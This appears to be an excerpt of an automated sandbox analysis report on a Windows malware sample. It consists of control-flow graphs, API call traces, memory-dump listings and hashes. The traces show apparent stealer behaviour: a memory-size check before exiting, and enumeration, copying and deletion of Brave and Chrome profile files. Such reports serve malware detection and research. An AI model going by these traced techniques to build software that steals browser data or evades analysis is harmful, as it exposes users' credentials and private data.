                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Similarity
                        • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                        • String ID:
                        • API String ID: 3477276466-0
                        • Opcode ID: 9910f62d5081de005865f0f7cd6eae6bd26463fe6a945a5823afaa7de06d2c2d
                        • Instruction ID: 67d5831372de76def8f2ab18ed6bd88dcb5478e572fc196289b3510c9bfd3e8c
                        • Opcode Fuzzy Hash: 9910f62d5081de005865f0f7cd6eae6bd26463fe6a945a5823afaa7de06d2c2d
                        • Instruction Fuzzy Hash: 0C01F4717403047BE7244A656C5AF6F77ADA784B01F308414F744F72C0DEB1EA008664

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2805 91ee90-91eeb5 call 902930 2808 91eeb7-91eebf 2805->2808 2809 91eec9-91eecd call 906c40 2805->2809 2808->2809 2810 91eec1-91eec3 lstrcpy 2808->2810 2812 91eed2-91eee8 StrCmpCA 2809->2812 2810->2809 2813 91ef11-91ef18 call 902a20 2812->2813 2814 91eeea-91ef02 call 902a20 call 902930 2812->2814 2819 91ef20-91ef28 2813->2819 2824 91ef45-91efa0 call 902a20 * 10 2814->2824 2825 91ef04-91ef0c 2814->2825 2819->2819 2821 91ef2a-91ef37 call 902930 2819->2821 2821->2824 2830 91ef39 2821->2830 2825->2824 2828 91ef0e-91ef0f 2825->2828 2829 91ef3e-91ef3f lstrcpy 2828->2829 2829->2824 2830->2829
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091EEC3
                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 0091EEDE
                        • lstrcpy.KERNEL32(00000000,ERROR), ref: 0091EF3F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Similarity
                        • API ID: lstrcpy
                        • String ID: ERROR
                        • API String ID: 3722407311-2861137601
                        • Opcode ID: ebed41277b69b01586e7f513189654c1fdd32bb8f33d2277a5a63f356c30c8f8
                        • Instruction ID: f7473b94be140d7926468012c2b03b52f3eb319ce6c46ef44efec3f1c806bdf0
                        • Opcode Fuzzy Hash: ebed41277b69b01586e7f513189654c1fdd32bb8f33d2277a5a63f356c30c8f8
                        • Instruction Fuzzy Hash: 5721073072020A9FCB21FF79DD4AB9E37A8AF50300F145428BC5ADB292DE30E8558B90

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2886 9010c0-9010cb 2887 9010d0-9010dc 2886->2887 2889 9010de-9010f3 GlobalMemoryStatusEx 2887->2889 2890 901112-901114 ExitProcess 2889->2890 2891 9010f5-901106 2889->2891 2892 901108 2891->2892 2893 90111a-90111d 2891->2893 2892->2890 2894 90110a-901110 2892->2894 2894->2890 2894->2893
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Similarity
                        • API ID: ExitGlobalMemoryProcessStatus
                        • String ID: @
                        • API String ID: 803317263-2766056989
                        • Opcode ID: 8a81a9959e6369d2b5c3818b496ac29e5ca49afc6fdd65067fa118b6733f531e
                        • Instruction ID: b2e00076bc3be7c1520c36bf211b987696d7ed438c60c3c4d54f36934f40fc05
                        • Opcode Fuzzy Hash: 8a81a9959e6369d2b5c3818b496ac29e5ca49afc6fdd65067fa118b6733f531e
                        • Instruction Fuzzy Hash: 19F0A77011C2455FEB5C6A64D84A73DF7ECEB01350F204929EEDAC31D1E670C8409567

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2895 918c88-918cc4 StrCmpCA 2897 918cc6-918cc7 ExitProcess 2895->2897 2898 918ccd-918ce6 2895->2898 2900 918ee2-918eef call 902a20 2898->2900 2901 918cec-918cf1 2898->2901 2902 918cf6-918cf9 2901->2902 2904 918ec3-918edc 2902->2904 2905 918cff 2902->2905 2904->2900 2941 918cf3 2904->2941 2907 918d30-918d3f lstrlen 2905->2907 2908 918e56-918e64 StrCmpCA 2905->2908 2909 918d5a-918d69 lstrlen 2905->2909 2910 918dbd-918dcb StrCmpCA 2905->2910 2911 918ddd-918deb StrCmpCA 2905->2911 2912 918dfd-918e0b StrCmpCA 2905->2912 2913 918e1d-918e2b StrCmpCA 2905->2913 2914 918e3d-918e4b StrCmpCA 2905->2914 2915 918d84-918d92 StrCmpCA 2905->2915 2916 918da4-918db8 StrCmpCA 2905->2916 2917 918d06-918d15 lstrlen 2905->2917 2918 918e88-918e9a lstrlen 2905->2918 2919 918e6f-918e7d StrCmpCA 2905->2919 2935 918d41-918d46 call 902a20 2907->2935 2936 918d49-918d55 call 902930 2907->2936 2908->2904 2931 918e66-918e6d 2908->2931 2920 918d73-918d7f call 902930 2909->2920 2921 918d6b-918d70 call 902a20 2909->2921 2910->2904 2924 918dd1-918dd8 2910->2924 2911->2904 2925 918df1-918df8 2911->2925 2912->2904 2926 918e11-918e18 2912->2926 2913->2904 2927 918e31-918e38 2913->2927 2914->2904 2928 918e4d-918e54 2914->2928 2915->2904 2923 918d98-918d9f 2915->2923 2916->2904 2929 918d17-918d1c call 902a20 2917->2929 2930 918d1f-918d2b call 902930 2917->2930 2933 918ea4-918eb0 call 902930 2918->2933 2934 918e9c-918ea1 call 902a20 2918->2934 2919->2904 2932 918e7f-918e86 2919->2932 2954 918eb3-918eb5 2920->2954 2921->2920 2923->2904 2924->2904 2925->2904 2926->2904 2927->2904 2928->2904 2929->2930 2930->2954 2931->2904 2932->2904 2933->2954 2934->2933 2935->2936 2936->2954 2941->2902 2954->2904 2955 918eb7-918eb9 2954->2955 2955->2904 2956 918ebb-918ebd lstrcpy 2955->2956 2956->2904
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: e0c2276ed3d511291375fddeb98901d5680d37629837b351aee34a62de33ddd8
                        • Instruction ID: 6f866e2e3de73d2448d9357cd91445dc4a752b40b04c7ad07d62c360bd0613e8
                        • Opcode Fuzzy Hash: e0c2276ed3d511291375fddeb98901d5680d37629837b351aee34a62de33ddd8
                        • Instruction Fuzzy Hash: 6DE0DFA1200394EBCB009BA8DC88D8BBB2CFF80308B208068F5004B211DB709C05CBAA
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009123D4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009123F7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00912402
                        • lstrlen.KERNEL32(\*.*), ref: 0091240D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091242A
                        • lstrcat.KERNEL32(00000000,\*.*), ref: 00912436
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091246A
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00912486
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                        • String ID: \*.*
                        • API String ID: 2567437900-1173974218
                        • Opcode ID: 47eb91ab2dcf9fb8bbff49679f20d183b934ad10c4e7307ef91b5648630d9208
                        • Instruction ID: c8f13a533c6be0e6112f08a43f098300a2d7f468dbbb2c842a01e6721dcd22c6
                        • Opcode Fuzzy Hash: 47eb91ab2dcf9fb8bbff49679f20d183b934ad10c4e7307ef91b5648630d9208
                        • Instruction Fuzzy Hash: C0A27D31A1161A9FCB21AF78DD88BEE77B9AF44300F144428F81AE7291DF74DD858B90
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009016E2
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00901719
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090176C
                        • lstrcat.KERNEL32(00000000), ref: 00901776
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009017A2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009017EF
                        • lstrcat.KERNEL32(00000000,00000000), ref: 009017F9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901825
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901875
                        • lstrcat.KERNEL32(00000000), ref: 0090187F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009018AB
                        • lstrcpy.KERNEL32(00000000,?), ref: 009018F3
                        • lstrcat.KERNEL32(00000000,00000000), ref: 009018FE
                        • lstrlen.KERNEL32(00931794), ref: 00901909
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901929
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00901935
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090195B
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00901966
                        • lstrlen.KERNEL32(\*.*), ref: 00901971
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090198E
                        • lstrcat.KERNEL32(00000000,\*.*), ref: 0090199A
                          • Part of subcall function 00924040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0092406D
                          • Part of subcall function 00924040: lstrcpy.KERNEL32(00000000,?), ref: 009240A2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009019C3
                        • lstrcpy.KERNEL32(00000000,?), ref: 00901A0E
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00901A16
                        • lstrlen.KERNEL32(00931794), ref: 00901A21
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901A41
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00901A4D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901A76
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00901A81
                        • lstrlen.KERNEL32(00931794), ref: 00901A8C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901AAC
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00901AB8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901ADE
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00901AE9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901B11
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00901B45
                        • StrCmpCA.SHLWAPI(?,009317A0), ref: 00901B70
                        • StrCmpCA.SHLWAPI(?,009317A4), ref: 00901B8A
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00901BC4
                        • lstrcpy.KERNEL32(00000000,?), ref: 00901BFB
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00901C03
                        • lstrlen.KERNEL32(00931794), ref: 00901C0E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901C31
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00901C3D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901C69
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00901C74
                        • lstrlen.KERNEL32(00931794), ref: 00901C7F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901CA2
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00901CAE
                        • lstrlen.KERNEL32(?), ref: 00901CBB
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901CDB
                        • lstrcat.KERNEL32(00000000,?), ref: 00901CE9
                        • lstrlen.KERNEL32(00931794), ref: 00901CF4
                        • lstrcpy.KERNEL32(00000000,?), ref: 00901D14
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00901D20
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901D46
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00901D51
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901D7D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901DE0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00901DEB
                        • lstrlen.KERNEL32(00931794), ref: 00901DF6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901E19
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00901E25
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901E4B
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00901E56
                        • lstrlen.KERNEL32(00931794), ref: 00901E61
                        • lstrcpy.KERNEL32(00000000,?), ref: 00901E81
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00901E8D
                        • lstrlen.KERNEL32(?), ref: 00901E9A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901EBA
                        • lstrcat.KERNEL32(00000000,?), ref: 00901EC8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901EF4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901F3E
                        • GetFileAttributesA.KERNEL32(00000000), ref: 00901F45
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00901F9F
                        • lstrlen.KERNEL32(015E88C8), ref: 00901FAE
                        • lstrcpy.KERNEL32(00000000,?), ref: 00901FDB
                        • lstrcat.KERNEL32(00000000,?), ref: 00901FE3
                        • lstrlen.KERNEL32(00931794), ref: 00901FEE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090200E
                        • lstrcat.KERNEL32(00000000,00931794), ref: 0090201A
                        • lstrcpy.KERNEL32(00000000,?), ref: 00902042
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090204D
                        • lstrlen.KERNEL32(00931794), ref: 00902058
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00902075
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00902081
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                        • String ID: \*.*
                        • API String ID: 4127656590-1173974218
                        • Opcode ID: 59ec256fb7c0348062c3c26fe57106bf26704e9574a7f0ef8a8dc01dce5db74b
                        • Instruction ID: 87fff58551de5e805252c4308bd3179c5e7a5fd8be65b53eaef8160cae589c6c
                        • Opcode Fuzzy Hash: 59ec256fb7c0348062c3c26fe57106bf26704e9574a7f0ef8a8dc01dce5db74b
                        • Instruction Fuzzy Hash: 5C925E31A1161A9FCB21EFA8DE88BAE77BDAF84704F144124F815A7291DF74DD05CBA0
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090DBC1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DBE4
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090DBEF
                        • lstrlen.KERNEL32(00934CA8), ref: 0090DBFA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DC17
                        • lstrcat.KERNEL32(00000000,00934CA8), ref: 0090DC23
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DC4C
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090DC8F
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090DCBF
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 0090DCD0
                        • StrCmpCA.SHLWAPI(?,009317A0), ref: 0090DCF0
                        • StrCmpCA.SHLWAPI(?,009317A4), ref: 0090DD0A
                        • lstrlen.KERNEL32(0092CFEC), ref: 0090DD1D
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090DD47
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DD70
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090DD7B
                        • lstrlen.KERNEL32(00931794), ref: 0090DD86
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DDA3
                        • lstrcat.KERNEL32(00000000,00931794), ref: 0090DDAF
                        • lstrlen.KERNEL32(?), ref: 0090DDBC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DDDF
                        • lstrcat.KERNEL32(00000000,?), ref: 0090DDED
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DE19
                        • lstrlen.KERNEL32(00931794), ref: 0090DE3D
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090DE6F
                        • lstrcat.KERNEL32(00000000,00931794), ref: 0090DE7B
                        • lstrlen.KERNEL32(015E8BC8), ref: 0090DE8A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DEB0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090DEBB
                        • lstrlen.KERNEL32(00931794), ref: 0090DEC6
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090DEE6
                        • lstrcat.KERNEL32(00000000,00931794), ref: 0090DEF2
                        • lstrlen.KERNEL32(015E8A08), ref: 0090DF01
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DF27
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090DF32
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DF5E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DFA5
                        • lstrcat.KERNEL32(00000000,00931794), ref: 0090DFB1
                        • lstrlen.KERNEL32(015E8BC8), ref: 0090DFC0
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DFE9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090DFF4
                        • lstrlen.KERNEL32(00931794), ref: 0090DFFF
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E022
                        • lstrcat.KERNEL32(00000000,00931794), ref: 0090E02E
                        • lstrlen.KERNEL32(015E8A08), ref: 0090E03D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090E063
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090E06E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090E09A
                        • StrCmpCA.SHLWAPI(?,Brave), ref: 0090E0CD
                        • StrCmpCA.SHLWAPI(?,Preferences), ref: 0090E0E7
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090E11F
                        • lstrlen.KERNEL32(015EE368), ref: 0090E12E
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E155
                        • lstrcat.KERNEL32(00000000,?), ref: 0090E15D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090E19F
                        • lstrcat.KERNEL32(00000000), ref: 0090E1A9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090E1D0
                        • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0090E1F9
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090E22F
                        • lstrlen.KERNEL32(015E88C8), ref: 0090E23D
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E261
                        • lstrcat.KERNEL32(00000000,015E88C8), ref: 0090E269
                        • lstrlen.KERNEL32(\Brave\Preferences), ref: 0090E274
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090E29B
                        • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 0090E2A7
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090E2CF
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E30F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090E349
                        • DeleteFileA.KERNEL32(?), ref: 0090E381
                        • StrCmpCA.SHLWAPI(?,015EE458), ref: 0090E3AB
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E3F4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090E41C
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E445
                        • StrCmpCA.SHLWAPI(?,015E8A08), ref: 0090E468
                        • StrCmpCA.SHLWAPI(?,015E8BC8), ref: 0090E47D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090E4D9
                        • GetFileAttributesA.KERNEL32(00000000), ref: 0090E4E0
                        • StrCmpCA.SHLWAPI(?,015EE398), ref: 0090E58E
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090E5C4
                        • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0090E639
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E678
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E6A1
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E6C7
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E70E
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E737
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E75C
                        • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0090E776
                        • DeleteFileA.KERNEL32(?), ref: 0090E7D2
                        • StrCmpCA.SHLWAPI(?,015E8978), ref: 0090E7FC
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E88C
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E8B5
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E8EE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090E916
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E952
                        Strings
                        Memory Dump Source
